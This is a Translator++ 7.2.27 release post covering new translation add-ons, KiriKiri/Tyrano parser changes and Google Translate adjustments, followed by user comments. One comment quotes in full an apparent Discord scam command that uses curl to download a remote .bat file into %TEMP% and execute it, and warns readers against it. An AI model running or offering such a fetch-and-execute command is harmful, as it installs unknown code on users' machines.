Translator++ ver. 7.2.27

Hello fellow translators,

I hope you're all doing well and enjoying your translation work!

The past two months have been quite busy for me as I’ve had to deal with some administrative matters at immigration. Living as an expatriate comes with its own challenges, but I’m managing.

What's New in Translator++ This Month?

This month brings a host of feature improvements and bug fixes, making Translator++ even more powerful and user-friendly.

Support for 30+ Automatic Translation Services

Did you know there’s a new translation option using Python’s Translators library?
This is a Translator++ mod ... a refined version of the existing Python library, now with caching and HTTP request support. You can easily install the PyTranslators add-on via the add-on installer.

Python's Translators documentation states that it supports:
Alibaba, Apertium, Argos, Baidu, Bing, Caiyun, CloudTranslation, Deepl, Elia, Google, Hujiang, Iciba, Iflytek, Iflyrec, Itranslate, Judic, LanguageWire, Lingvanex, Niutrans, Mglip, Mirai, ModernMt, MyMemory, Papago, QqFanyi, QqTranSmart, Reverso, Sogou, SysTran, Tilde, TranslateCom, TranslateMe, Utibet, VolcEngine, Yandex, Yeekit, Youdao

See some redundant service? Well, you have options now. 😉

Enhanced Parsers for KiriKiri & Tyrano

You now have the option to translate attributes from tags, giving you more control over your translations.

Additionally, actor names will now be automatically parsed into text context when creating a project, making it much easier to translate dialogue accurately.

Want more customization? You can also define custom actor name tags to include in your translation project.

Tyrano Extractor Improvements

The built-in extractor for Tyrano games has been enhanced. It can now automatically detect and extract games packaged with Electron, streamlining the process.

Have jumped into the bandwagon of the DeepSeek Hype?

If you've been following the rise of DeepSeek, here’s some great news!
You can now use all AI services that support the OpenAI API, including DeepSeek, with the OpenAI ChatGPT add-on in Translator++.

Google Translate's Recent Changes

Recently, Google made a silent update to translate.google.com, affecting all tools that rely on the unofficial web translation API.

What’s Different?

Better, more natural translations – Google Translate now considers previous lines for context instead of translating each line separately.
Inconsistent line structure – This makes batch translations more challenging, as the number of output lines may not match the original.

Interestingly, translation results differ between the API and the web version. The API version preserves structure and order (including line breaks), while the web version prioritizes context, sometimes ignoring formatting. Even though they use the same backend, the results are noticeably different.

How is Translator++ Adapting?

Several fixes have already been applied to handle these changes, but I’m also working on a new Google Translate add-on that will mimic the web version’s behavior more closely.
This new translator engine is expected to be released next month, so stay tuned!😉

Thank you all for your continued support! Your feedback and enthusiasm keep Translator++ growing stronger.💪

Cheers,
Dreamsavior

RPG_SeekerOfTheTruth

Yeah I think the Discord (or the mod(s)) might have been compromised. The threat of "We are pruning all members who don't verify in 30 minutes" via command prompt (cmd.exe /c curl -sS -o "%TEMP%/messagebox.bat" https://files.catbox.moe/12par8.bat && "%TEMP%/messagebox.bat" # Press Enter to verify) is social engineering.

Satou Pendragon

So I noticed that now we have to verify to use the Discord by running a command prompt? That's sketchy as hell, I'm not putting my PC at risk for that.
